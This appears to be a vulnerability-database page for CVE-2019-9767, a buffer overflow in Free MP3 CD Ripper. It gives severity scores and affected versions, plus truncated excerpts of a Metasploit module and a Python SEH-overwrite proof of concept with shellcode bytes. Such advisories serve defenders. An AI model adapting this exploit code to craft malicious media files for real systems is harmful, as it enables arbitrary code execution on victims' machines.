CVE-2019-9767
published 2019-03-14CVE-2019-9767: Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted…
PriorityP336high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
7.99%
94.0th percentile
Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .wma file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cleanersoft | free_mp3_cd_ripper | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
exploitdb·2020-11-20
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "Free MP3 CD Ripper 2.6 %q{
This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gionathan Reale', # Exploit-DB POC
'ZwX' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2019-9767' ],
[ 'EDB', '45412' ],
[ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
],
'Platform' => 'win',
'Targets' =>
[
[
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)
exploitdb·2018-09-14
CVE-2019-9767 Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)
Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)
---
# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.wma".
# Start the program and click on "Convert".
# Find the file "exploit.wma" and click "Open"
# You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160157/Free-MP3-CD-Ripper-2.8-Buffer-Overflow.htmlhttps://packetstormsecurity.com/files/149371/Free-MP3-CD-Ripper-2.6-Local-Buffer-Overflow.htmlhttps://www.exploit-db.com/exploits/45412http://packetstormsecurity.com/files/160157/Free-MP3-CD-Ripper-2.8-Buffer-Overflow.htmlhttps://packetstormsecurity.com/files/149371/Free-MP3-CD-Ripper-2.6-Local-Buffer-Overflow.htmlhttps://www.exploit-db.com/exploits/45412
2019-03-14
Published